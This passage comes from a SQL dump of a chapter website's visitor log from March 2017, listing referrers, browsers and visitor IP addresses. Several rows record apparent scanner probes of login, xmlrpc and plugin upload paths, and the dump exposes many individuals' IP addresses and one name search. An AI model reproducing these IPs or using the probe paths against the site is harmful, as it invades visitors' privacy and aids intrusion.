2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','192.199.255.83','000',2,0),(2078,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.218','000',1,0),(2079,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.208.97.40','000',3,0),(2080,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.42.216.240','000',1,0),(2081,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.44.130','000',1,0),(2082,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','60.241.63.204','000',2,0),(2083,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.202','000',1,0),(2084,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','194.9.94.213','000',1,0),(2085,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','109.232.216.209','000',1,0),(2086,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.119.34','000',1,0),(2087,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.175.239.7','000',1,0),(2088,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.238.100.141','000',1,0),(2089,'2017-03-19','http://xdoza.com/','Unknown','Unknown','Unknown','','46.118.122.226','000',2,0),(2090,'2017-03-19','https://www.google.com/','Chrome','Android','56.0.2924.87','','68.33.90.156','000',10,0),(2091,'2017-03-19','http://moskva.nodup.ru/','Opera','Windows','7.54','','46.118.122.226','000',1,0),(2092,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','177.42.90.20','000',2,0),(2093,'2017-03-19','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','185.19.18.74','000',3,0),(2094,'2017-03-19','http://avtolombard-krasnodar.ru/','MSIE','Windows','6.0','','176.8.251.60','000',1,0),(2095,'2017-03-19','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.204','000',1,0),(2096,'2017-03-19','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(2097,'2017-03-19','http://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(2098,'2017-03-19','http://zphiblgz.org/event/march-dimes-march-babies/','MSIE','Windows','10.0','','137.74.167.96','000',1,0),(2099,'2017-03-20','http://iqs.biz.ua/','MSIE','Windows','6.0','','46.118.117.16','000',4,0),(2100,'2017-03-20','https://www.google.com/','Chrome','Windows','49.0.2623.112','','72.89.210.57','000',1,0),(2101,'2017-03-20','http://zphiblgz.org','Chrome','Windows','39.0.2171.99','','192.198.80.227','000',2,0),(2102,'2017-03-20','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.34.51','000',2,0),(2103,'2017-03-20','http://interior-stickers.ru/','Opera','Windows','8.00','','46.118.117.16','000',3,0),(2104,'2017-03-20','http://evrotekhservis.ru/','MSIE','Windows','6.0','','178.137.164.87','000',1,0),(2105,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.97.80','000',2,0),(2106,'2017-03-20','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','91.121.83.118','000',1,0),(2107,'2017-03-20','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(2108,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.78','000',10,0),(2109,'2017-03-20','http://zphiblgz.org','MSIE','Windows','7.0','','50.225.39.78','000',2,0),(2110,'2017-03-20','http://zphiblgz.org','MSIE','Windows','10.0','','50.225.39.78','000',2,0),(2111,'2017-03-20','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','86.93.0.132','000',1,0),(2112,'2017-03-20','http://zphiblgz.org/scholarship/','Safari','Macintosh','10.0.3','','98.117.209.84','000',1,0),(2113,'2017-03-20','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.160','000',1,0),(2114,'2017-03-20','http://zphiblgz.org','Chrome','Windows','57.0.2987.98','','204.126.132.241','000',5,0),(2115,'2017-03-20','http://zphiblgz.org','Edge','Windows','14.14393','','100.36.97.80','000',7,0),(2116,'2017-03-20','http://www.zphibmaryland.org/chapters/','Chrome','Windows','56.0.2924.87','','162.247.192.3','000',6,0),(2117,'2017-03-20','http://zphiblgz.org','Firefox','Windows','40.1','','41.136.96.246','000',1,0),(2118,'2017-03-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(2119,'2017-03-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(2120,'2017-03-20','http://zphiblgz.org','MSIE','Windows','7.0','','69.250.74.88','000',2,0),(2121,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.250.74.88','000',4,0),(2122,'2017-03-20','http://zphiblgz.org','MSIE','Windows','7.0','','100.36.97.80','000',2,0),(2123,'2017-03-20','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','45.79.96.241','000',1,0),(2124,'2017-03-20','http://mega-polis.biz.ua/','MSIE','Windows','6.0','','46.118.122.226','000',1,0),(2125,'2017-03-20','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwilnKO8kubSAhVkh1QKHbPlB48QFggoMAI&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','96.241.91.107','000',5,0),(2126,'2017-03-20','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(2127,'2017-03-20','https://www.google.com/','Safari','iPhone','10.0','','73.213.22.160','000',4,0),(2128,'2017-03-20','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.22.160','000',13,0),(2129,'2017-03-20','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.151.77','000',7,0),(2130,'2017-03-20','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.133.254.145','000',3,0),(2131,'2017-03-20','http://zphiblgz.org','Safari','iPhone','10.0','','173.69.176.216','000',1,0),(2132,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.255.243.196','000',1,0),(2133,'2017-03-20','http://zphiblgz.org','Microsoft','Unknown','Unknown','','71.244.153.110','000',2,0),(2134,'2017-03-20','http://zphiblgz.org','MSIE','Windows','7.0','','71.244.153.110','000',2,0),(2135,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',4,0),(2136,'2017-03-20','https://www.google.com/','Chrome','Android','56.0.2924.87','','71.244.153.110','000',7,0),(2137,'2017-03-20','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','45.79.69.226','000',1,0),(2138,'2017-03-20','http://zphiblgz.org','Chrome','Windows','49.0.2623.110','','219.145.144.65','000',1,0),(2139,'2017-03-20','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.16.224.211','000',2,0),(2140,'2017-03-20','http://pizza-tycoon.com/','Chrome','Linux','37.0.2062.120','','91.219.237.229','000',1,0),(2141,'2017-03-20','http://zphiblgz.org','MSIE','Windows','7.0','','100.16.224.211','000',2,0),(2142,'2017-03-20','http://zphiblgz.org','Edge','Windows','14.14393','','100.16.224.211','000',1,0),(2143,'2017-03-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','198.11.174.193','000',23,0),(2144,'2017-03-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','198.11.174.193','000',2,0),(2145,'2017-03-21','http://zphiblgz.org','Chrome','Windows','54.0.2840.99','','117.78.13.57','000',1,0),(2146,'2017-03-21','http://zphiblgz.org','MSIE','Windows','10.0','','136.243.17.161','000',1,0),(2147,'2017-03-21','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.105','000',1,0),(2148,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','156.204.57.57','000',2,0),(2149,'2017-03-21','http://zphiblgz.org/','MSIE','Windows','6.0','','202.9.43.54','000',1,0),(2150,'2017-03-21','http://kinohall.ru/','MSIE','Unknown','6.0','','46.118.115.43','000',4,0),(2151,'2017-03-21','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.122','000',1,0),(2152,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','90.109.203.91','000',1,0),(2153,'2017-03-21','http://xn--80aikhbrhr.net/','MSIE','Windows','5.5','','46.118.117.16','000',2,0),(2154,'2017-03-21','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','71.244.153.110','000',1,0),(2155,'2017-03-21','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.14.220','000',4,0),(2156,'2017-03-21','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','50.225.39.83','000',2,0),(2157,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','60.102.99.234','000',2,0),(2158,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','92.126.17.134','000',2,0),(2159,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','176.42.208.111','000',2,0),(2160,'2017-03-21','http://zphiblgz.org','Safari','iPhone','10.0','','172.56.3.194','000',7,0),(2161,'2017-03-21','http://zphiblgz.org/scholarship/application/','Safari','iPhone','10.0','','50.225.39.86','000',4,0),(2162,'2017-03-21','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','62.209.22.222','000',1,0),(2163,'2017-03-21','http://zphiblgz.org','Firefox','Windows','29.0','','185.15.74.218','000',2,0),(2164,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.30.66','000',1,0),(2165,'2017-03-21','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(2166,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','202.79.17.169','000',2,0),(2167,'2017-03-21','http://www.zphibmaryland.org/chapters/','Chrome','iPhone','57.0.2987.100','','73.213.36.209','000',6,0),(2168,'2017-03-21','http://zphiblgz.org','Edge','Windows','14.14393','','174.205.11.222','000',4,0),(2169,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','151.45.81.5','000',2,0),(2170,'2017-03-21','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.86','000',6,0),(2171,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','94.96.122.139','000',2,0),(2172,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','163.172.54.35','000',1,0),(2173,'2017-03-21','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','66.87.85.239','000',1,0),(2174,'2017-03-21','https://www.google.com/','Chrome','Windows','56.0.2924.87','','50.225.39.33','000',5,0),(2175,'2017-03-21','https://www.google.com/','Chrome','Windows','56.0.2924.87','','162.99.243.38','000',1,0),(2176,'2017-03-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2177,'2017-03-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(2178,'2017-03-21','http://gilsonchiro.xyz/','MSIE','Windows','6.0','','46.118.115.43','000',3,0),(2179,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','86.120.51.73','000',2,0),(2180,'2017-03-21','http://zphiblgz.org','Firefox','Windows','40.1','','37.189.19.60','000',2,0),(2181,'2017-03-21','http://zphiblgz.org/wp-login.php','MSIE','Windows','10.0','','179.125.64.164','000',1,0),(2182,'2017-03-21','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','66.87.128.53','000',1,0),(2183,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','91.121.93.7','000',1,0),(2184,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.31.140.19','000',1,0),(2185,'2017-03-21','http://xdoza.com/','MSIE','Windows','6.0','','46.118.122.226','000',3,0),(2186,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','174.136.13.253','000',1,0),(2187,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','151.236.51.76','000',1,0),(2188,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','203.170.85.128','000',1,0),(2189,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.50','000',1,0),(2190,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','46.59.47.7','000',1,0),(2191,'2017-03-21','http://avon-ukraine.com/','Opera','Windows','7.54','','46.118.122.226','000',2,0),(2192,'2017-03-21','http://zphiblgz.org/scholarship/','Edge','Windows','14.14393','','100.36.97.80','000',1,0),(2193,'2017-03-21','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(2194,'2017-03-21','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','176.8.251.60','000',3,0),(2195,'2017-03-21','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',4,0),(2196,'2017-03-21','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','100.16.230.100','000',12,0),(2197,'2017-03-21','http://zphiblgz.org','Firefox','Windows','16.0','','5.9.94.207','000',1,0),(2198,'2017-03-21','http://zphiblgz.org','Firefox','Windows','12.0','','136.243.17.161','000',1,0),(2199,'2017-03-21','http://zphiblgz.org','Firefox','Linux','17.0','','78.46.156.169','000',1,0),(2200,'2017-03-21','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(2201,'2017-03-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',1,0),(2202,'2017-03-21','http://zajm-zalog-krasnodar.ru/','MSIE','Windows','6.0','','37.115.191.53','000',1,0),(2203,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','36.231.160.71','000',1,0),(2204,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','112.200.197.160','000',2,0),(2205,'2017-03-22','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','91.213.8.84','000',1,0),(2206,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','79.107.38.234','000',1,0),(2207,'2017-03-22','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','50.225.39.84','000',2,0),(2208,'2017-03-22','http://kinoplen.ru/','MSIE','Windows','6.0','','37.115.191.53','000',3,0),(2209,'2017-03-22','http://dpdr.ru/','MSIE','Windows','6.0','','46.118.117.16','000',4,0),(2210,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','109.98.163.58','000',2,0),(2211,'2017-03-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(2212,'2017-03-22','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','45.79.66.231','000',1,0),(2213,'2017-03-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.142','000',1,0),(2214,'2017-03-22','http://www.bing.com/search?q=beta+gamma+lambda&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.114','000',1,0),(2215,'2017-03-22','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','45.79.69.226','000',1,0),(2216,'2017-03-22','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(2217,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','90.51.52.221','000',2,0),(2218,'2017-03-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',12,0),(2219,'2017-03-22','https://www.google.com/','Chrome','Windows','56.0.2924.87','','68.64.239.18','000',3,0),(2220,'2017-03-22','http://zphiblgz.org','Safari','Macintosh','9.0.1','','166.137.244.51','000',4,0),(2221,'2017-03-22','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',4,0),(2222,'2017-03-22','http://zphiblgz.org','Safari','Macintosh','10.0.3','','204.126.132.241','000',1,0),(2223,'2017-03-22','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','204.126.132.241','000',3,0),(2224,'2017-03-22','http://zphiblgz.org','Microsoft','Unknown','Unknown','','206.29.176.74','000',2,0),(2225,'2017-03-22','http://zphiblgz.org','MSIE','Windows','7.0','','206.29.176.74','000',4,0),(2226,'2017-03-22','http://zphiblgz.org','MSIE','Windows','11.0','','206.29.176.74','000',9,0),(2227,'2017-03-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.250.74.88','000',2,0),(2228,'2017-03-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2229,'2017-03-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(2230,'2017-03-22','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.33.81','000',1,0),(2231,'2017-03-22','http://zphiblgz.org/wp-admin/','MSIE','Windows','6.0','','5.61.33.81','000',1,0),(2232,'2017-03-22','http://www.love-baby.cz/','MSIE','Unknown','7.0b','','37.115.191.53','000',3,0),(2233,'2017-03-22','http://mcar.in.ua/','Opera','Windows','9.00','','46.118.122.226','000',1,0),(2234,'2017-03-22','http://www.bing.com/search?q=www.zphiblgz.org%2Fscholarships&form=MSSEDF&pc=MSE1','MSIE','Windows','11.0','','71.246.253.107','000',7,0),(2235,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','73.184.45.111','000',2,0),(2236,'2017-03-22','https://www.google.com/','Chrome','Windows','56.0.2924.87','','100.15.167.243','000',7,0),(2237,'2017-03-22','https://www.google.com/','Safari','iPhone','10.0','','73.135.241.148','000',4,0),(2238,'2017-03-22','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',7,0),(2239,'2017-03-22','http://www.google.com/search?hl=en&redir_esc=&client=ms-android-att-us&source=android-browser-suggest&v=141338691&qsubts=1490232948232&action=devloc&q=cassandra+dorsey','Android Browser','Android','4.0','','98.20.189.23','000',3,0),(2240,'2017-03-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.146.193','000',5,0),(2241,'2017-03-22','https://www.google.com/','Safari','iPhone','10.0','','71.244.146.193','000',1,0),(2242,'2017-03-22','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.119','000',1,0),(2243,'2017-03-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.117','000',1,0),(2244,'2017-03-22','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.159.178.66','000',1,0),(2245,'2017-03-22','http://znaniyapolza.ru/','MSIE','Windows','5.0','','46.118.117.16','000',2,0),(2246,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','183.88.42.118','000',2,0),(2247,'2017-03-22','http://zphiblgz.org','Firefox','Windows','40.1','','181.124.158.131','000',2,0),(2248,'2017-03-22','http://wheelchairliftsarea.com/','Opera','Windows','8.00','','46.118.122.226','000',1,0),(2249,'2017-03-23','http://konturkrasoty.ru/','Opera','Windows','8.00','','46.118.115.43','000',1,0),(2250,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','213.177.10.42','000',1,0),(2251,'2017-03-23','http://zphiblgz.org/','Chrome','Windows','44.0.2403.125','','62.212.73.49','000',1,0),(2252,'2017-03-23','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(2253,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','105.230.183.69','000',1,0),(2254,'2017-03-23','http://zphiblgz.org','Edge','Windows','14.14393','','73.163.67.170','000',1,0),(2255,'2017-03-23','http://zphiblgz.org','Firefox','Macintosh','3.6.8','','46.4.123.54','000',1,0),(2256,'2017-03-23','https://www.google.com/','Chrome','Windows','56.0.2924.87','','50.225.39.91','000',4,0),(2257,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','59.91.87.44','000',2,0),(2258,'2017-03-23','http://zphiblgz.org','Edge','Windows','14.14393','','100.16.224.211','000',6,0),(2259,'2017-03-23','http://zphiblgz.org/scholarship/','Edge','Windows','14.14393','','100.36.97.80','000',2,0),(2260,'2017-03-23','https://www.google.com','Firefox','Macintosh','45.0','','50.225.39.61','000',17,0),(2261,'2017-03-23','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiA2Jyo_uzSAhUBUmMKHerABjAQFggZMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q&bvm=bv.150475504,d.eWE','MSIE','Windows','11.0','','205.222.248.81','000',2,0),(2262,'2017-03-23','http://whiteelephantwellington.com/','MSIE','Windows','6.0','','46.118.117.16','000',1,0),(2263,'2017-03-23','http://zphiblgz.org','MSIE','Windows','5.01','','95.240.225.67','000',1,0),(2264,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','186.244.43.163','000',2,0),(2265,'2017-03-23','http://remontbiz.ru/','MSIE','Unknown','7.0b','','46.118.122.226','000',3,0),(2266,'2017-03-23','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','192.99.147.201','000',1,0),(2267,'2017-03-23','http://mosrif.ru/','MSIE','Windows','7.0b','','46.118.115.43','000',1,0),(2268,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','122.34.0.4','000',2,0),(2269,'2017-03-23','http://fable.in.ua/','MSIE','Windows','7.0','','46.118.122.226','000',1,0),(2270,'2017-03-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(2271,'2017-03-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(2272,'2017-03-23','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.198','000',1,0),(2273,'2017-03-23','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.7','000',4,0),(2274,'2017-03-23','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','134.192.186.179','000',7,0),(2275,'2017-03-23','http://w3data.co/profile.php?lookup=zphiblgz.org','Chrome','Windows','40.0.2214.115','','104.156.230.231','000',1,0),(2276,'2017-03-23','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.135.217.107','000',1,0),(2277,'2017-03-23','https://search.yahoo.com/','Firefox','Windows','52.0','','104.57.30.100','000',2,0),(2278,'2017-03-23','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',2,0),(2279,'2017-03-23','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiu38KK2e3SAhWEsVQKHbWbC3gQFggaMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ&sig2=ZG1eMU8cnCDux8OO9wj-gA&bvm=bv.150475504,d.eWE','MSIE','Windows','11.0','','71.179.98.25','000',1,0),(2280,'2017-03-23','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','173.67.1.94','000',2,0),(2281,'2017-03-23','http://expertblog.info/','MSIE','Windows','6.0','','37.115.191.53','000',1,0),(2282,'2017-03-23','https://www.bing.com/','Edge','Windows','14.14393','','74.222.109.18','000',14,0),(2283,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','95.107.235.236','000',2,0),(2284,'2017-03-23','http://zphiblgz.org','Chrome','Windows','33.0.1808.34','','198.23.144.76','000',2,0),(2285,'2017-03-23','http://zphiblgz.org','Safari','iPhone','9.0','','50.225.39.84','000',6,0),(2286,'2017-03-23','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.131.177','000',8,0),(2287,'2017-03-23','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.93.195','000',8,0),(2288,'2017-03-23','http://zphiblgz.org','Firefox','Windows','52.0','','71.244.143.59','000',6,0),(2289,'2017-03-23','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','66.87.128.187','000',2,0),(2290,'2017-03-23','http://zphiblgz.org','Firefox','Windows','40.1','','105.187.105.234','000',1,0),(2291,'2017-03-23','http://ZPHIBLGZ.ORG/','Chrome','Windows','47.0.2526.111','','109.86.72.150','000',1,0),(2292,'2017-03-23','http://ZPHIBLGZ.ORG/','Chrome','Windows','48.0.2564.109','','109.86.71.185','000',1,0),(2293,'2017-03-24','http://stroyhelp-dv.ru/','MSIE','Windows','5.0','','37.115.191.53','000',2,0),(2294,'2017-03-24','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.205','000',1,0),(2295,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','217.144.52.167','000',1,0),(2296,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','39.43.189.107','000',2,0),(2297,'2017-03-24','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','173.234.24.67','000',24,0),(2298,'2017-03-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.234.24.67','000',1,0),(2299,'2017-03-24','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.138','000',1,0),(2300,'2017-03-24','https://www.google.com/','Safari','iPad','10.0','','50.225.39.91','000',4,0),(2301,'2017-03-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.80','000',6,0),(2302,'2017-03-24','http://zphiblgz.org','Safari','iPhone','10.0','','50.225.39.84','000',14,0),(2303,'2017-03-24','http://www.bing.com/search?q=Lambda+tau+chapter+of+zeta+phi+beta&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','65.55.211.248','000',1,0),(2304,'2017-03-24','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjzs6W5oe_SAhXBy4MKHXOlD30QFggeMAE&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q&bvm=bv.150475504,d.eWE','MSIE','Windows','11.0','','205.222.248.81','000',12,0),(2305,'2017-03-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.83','000',6,0),(2306,'2017-03-24','http://zphiblgz.org/','Chrome','Windows','48.0.2564.116','','77.106.220.239','000',4,0),(2307,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','89.177.148.122','000',1,0),(2308,'2017-03-24','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjHzrKftu_SAhWBTiYKHYxpCZsQFggcMAA&url=http%3A%2F%2Fzphiblgz.org%2Fhistory%2F&usg=AFQjCNGBdqTC7I-6SbdQS3CAHLsMUZxcCQ','MSIE','Windows','11.0','','149.101.1.116','000',1,0),(2309,'2017-03-24','http://ed-shop01.ru/','MSIE','Windows','6.0','','37.115.191.53','000',1,0),(2310,'2017-03-24','http://zphiblgz.org','Safari','iPhone','9.0','','50.225.39.83','000',8,0),(2311,'2017-03-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.85','000',22,0),(2312,'2017-03-24','https://www.google.com/','Chrome','Macintosh','54.0.2840.98','','50.225.39.86','000',1,0),(2313,'2017-03-24','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(2314,'2017-03-24','http://pizza-tycoon.com/','Chrome','Linux','37.0.2062.120','','85.248.227.163','000',1,0),(2315,'2017-03-24','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.225','000',1,0),(2316,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','212.183.66.25','000',1,0),(2317,'2017-03-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(2318,'2017-03-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(2319,'2017-03-24','http://zphiblgz.org','Firefox','Macintosh','48.0','','50.225.39.83','000',1,0),(2320,'2017-03-24','http://mega-polis.biz.ua/','Unknown','Unknown','Unknown','','46.118.122.226','000',2,0),(2321,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','79.118.110.82','000',1,0),(2322,'2017-03-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',5,0),(2323,'2017-03-24','http://zphiblgz.org/','Chrome','iPhone','57.0.2987.100','','73.213.36.209','000',4,0),(2324,'2017-03-24','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','216.244.85.146','000',1,0),(2325,'2017-03-24','https://2dm.prohoster.info/','MSIE','Windows','6.0','','176.8.251.60','000',3,0),(2326,'2017-03-24','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.132.179','000',1,0),(2327,'2017-03-24','http://zphiblgz.org','MSIE','Windows','9.0','','65.55.212.95','000',1,0),(2328,'2017-03-24','http://zphiblgz.org','MSIE','Windows','7.0','','100.36.61.208','000',4,0),(2329,'2017-03-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.61.208','000',15,0),(2330,'2017-03-24','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.33.12.243','000',1,0),(2331,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','91.140.105.251','000',2,0),(2332,'2017-03-24','zphiblgz.